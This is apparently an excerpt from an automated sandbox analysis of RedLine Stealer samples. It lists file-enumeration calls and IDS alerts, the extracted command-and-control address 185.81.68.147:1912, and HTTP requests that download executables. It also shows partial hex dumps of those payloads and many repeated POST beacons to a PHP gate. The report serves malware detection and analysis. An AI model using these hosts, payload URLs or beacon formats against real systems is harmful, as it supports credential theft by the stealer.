                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeCode function: 0_2_00007FF79CD671BC _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,0_2_00007FF79CD671BC
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F279B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,20_2_00007FF641F279B0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F285A0 FindFirstFileExW,FindClose,20_2_00007FF641F285A0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F40B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,20_2_00007FF641F40B84
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F285A0 FindFirstFileExW,FindClose,21_2_00007FF641F285A0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F40B84 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,21_2_00007FF641F40B84
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F279B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,21_2_00007FF641F279B0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B837303C FindFirstFileExW,FindNextFileW,FindClose,21_2_00007FF8B837303C
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B8373280 FindFirstFileExW,FindNextFileW,FindClose,21_2_00007FF8B8373280
                  Source: C:\Users\user\Desktop\Grabber.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeFile opened: C:\Users\user\AppData\Jump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeFile opened: C:\Users\user\Jump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeFile opened: C:\Users\user\AppData\Local\Temp\B334.tmp\B335.tmpJump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeFile opened: C:\Users\user\AppData\Local\Temp\B334.tmpJump to behavior
                  Source: C:\Users\user\Desktop\Grabber.exeFile opened: C:\Users\user\AppData\Local\Temp\B334.tmp\B335.tmp\B336.tmpJump to behavior

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.2.5:49709 -> 185.81.68.147:1912
                  Source: Network trafficSuricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.2.5:49709 -> 185.81.68.147:1912
                  Source: Network trafficSuricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 185.81.68.147:1912 -> 192.168.2.5:49709
                  Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 185.81.68.147:1912 -> 192.168.2.5:49709
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\explorer.exeNetwork Connect: 185.81.68.147 80Jump to behavior
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: 185.81.68.147:1912
                  Source: global trafficTCP traffic: 192.168.2.5:49709 -> 185.81.68.147:1912
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 15 Dec 2024 16:12:07 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Thu, 12 Dec 2024 10:50:51 GMTETag: "4b200-629107cd804d2"Accept-Ranges: bytesContent-Length: 307712Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 dc 48 28 d2 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e4 02 00 00 cc 01 00 00 00 00 00 8e 02 03 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 3c 02 03 00 4f 00 00 00 00 20 03 00 c6 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 94 e2 02 00 00 20 00 00 00 e4 02 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c6 c9 01 00 00 20 03 00 00 ca 01 00 00 e6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 05 00 00 02 00 00 00 b0 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 02 03 00 00 00 00 00 48 00 00 00 02 00 05 00 20 83 01 00 1c 7f 01 00 03 00 00 00 8f 02 00 06 28 77 01 00 f8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 00 75 00 74 00 6f 00 66 00 69 00 6c 00 6c 00 35 00 74 00 59 00 57 00 52 00 71 00 61 00 57 00 56 00 6f 00 61 00 6d 00 68 00 68 00 61 00 6d 00 4a 00 38 00 57 00 57 00 39 00 79 00 62 00 32 00 6c 00 58 00 59 00 57 00 78 00 73 00 5a 00 58 00 51 00 4b 00 61 00 57 00 4a 00 75 00 5a 00 57 00 70 00 6b 00 5a 00 6d 00 70 00 74 00 62 00 57 00 74 00 77 00 59 00 32 00 35 00 73 00 63 00 47 00 56 00 69 00 61 00 32 00 78 00 74 00 62 00 6d 00 74 00 76 00 5a 00 57 00 39 00 70 00 61 00 47 00 39 00 6d 00 5a 00 57 00 4e 00 38 00 56 00 48 00 4a 00 76 00 62 00 6d 00 78 00 70 00 62 00 6d 00 73 00 4b 00 61 00 6d 00 4a 00 6b 00 59 00 57 00 39 00 6a 00 62 00 6d 00 56 00 70 00 61 00 57 00 6c 00 75 00 62 00 57 00 70 00 69 00 61 00 6d 00 78 00 6e 00 59 00 57 00 78 00 6f 00 59 00 32 00 56 00 73 00 5a 00 32 00 4a 00 6c 00 61 00 6d 00 31 00 75 00 61 00 57 00 52 00 38 00 54 00 6d 00 6c 00 6d 00 64 00 48 00 6c 00 58 00 59 00 57 00 78 00 73 00
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 15 Dec 2024 16:12:09 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Sat, 14 Dec 2024 13:10:00 GMTETag: "5a4536-6293aaa2cd4c8"Accept-Ranges: bytesContent-Length: 5915958Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1c 09 0d a3 58 68 63 f0 58 68 63 f0 58 68 63 f0 13 10 60 f1 5f 68 63 f0 13 10 66 f1 ec 68 63 f0 13 10 67 f1 52 68 63 f0 9b eb 9e f0 5b 68 63 f0 9b eb 60 f1 51 68 63 f0 9b eb 67 f1 49 68 63 f0 9b eb 66 f1 70 68 63 f0 13 10 62 f1 53 68 63 f0 58 68 62 f0 c9 68 63 f0 4b ec 67 f1 41 68 63 f0 4b ec 61 f1 59 68 63 f0 52 69 63 68 58 68 63 f0 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 a8 83 5d 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0e 28 00 94 02 00 00 58 02 00 00 00 00 00 d0 c0 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 05 00 00 04 00 00 dd 61 5a 00 02 00 60 c1 80 84 1e 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c c7 03 00 78 00 00 00 00 90 04 00 1c f4 00 00 00 60 04 00 08 22 00 00 00 00 00 00 00 00 00 00 00 90 05 00 68 07 00 00 c0 9d 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 9c 03 00 40 01 00 00 00 00 00 00 00 00 00 00 00 b0 02 00 50 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 10 92 02 00 00 10 00 00 00 94 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 42 26 01 00 00 b0 02 00 00 28 01 00 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 d8 73 00 00 00 e0 03 00 00 0e 00 00 00 c0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 08 22 00 00 00 60 04 00 00 24 00 00 00 ce 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 1c f4 00 00 00 90 04 00 00 f6 00 00 00 f2 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 68 07 00 00 00 90 05 00 00 08 00 00 00 e8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                  Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Sun, 15 Dec 2024 16:12:21 GMTServer: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12Last-Modified: Sun, 15 Dec 2024 06:09:39 GMTETag: "4ba00-62948e8bd5049"Accept-Ranges: bytesContent-Length: 309760Connection: closeContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 63 eb 5a 12 27 8a 34 41 27 8a 34 41 27 8a 34 41 2e f2 a7 41 24 8a 34 41 27 8a 35 41 2d 8a 34 41 48 fc 9f 41 2d 8a 34 41 48 fc ae 41 26 8a 34 41 48 fc a9 41 26 8a 34 41 52 69 63 68 27 8a 34 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 06 00 92 72 5e 67 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 0a 00 00 3a 00 00 00 34 00 00 00 00 00 00 18 34 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 05 00 02 00 00 00 00 00 05 00 02 00 00 00 00 00 00 00 05 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 70 72 00 00 28 00 00 00 00 a0 00 00 28 03 00 00 00 90 00 00 4c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 00 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 17 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 b2 23 00 00 00 50 00 00 00 24 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 88 06 00 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 70 64 61 74 61 00 00 4c 02 00 00 00 90 00 00 00 04 00 00 00 62 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 28 03 00 00 00 a0 00 00 00 04 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 36 34 00 00 00 00 00 50 04 00 00 b0 00 00 00 50 04 00 00 6a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                  Source: Joe Sandbox ViewIP Address: 185.81.68.147 185.81.68.147
                  Source: Joe Sandbox ViewASN Name: KLNOPT-ASFI KLNOPT-ASFI
                  Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49707 -> 185.81.68.147:80
                  Source: Network trafficSuricata IDS: 2019714 - Severity 2 - ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile : 192.168.2.5:49708 -> 185.81.68.147:80
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 37
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: GET /ssg.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                  Source: global trafficHTTP traffic detected: GET /zx.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                  Source: global trafficHTTP traffic detected: GET /update.exe HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
                  Source: global trafficHTTP traffic detected: POST /VzCAHn.php?616766F8886C145454191 HTTP/1.1Host: 185.81.68.147Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3Content-Length: 4
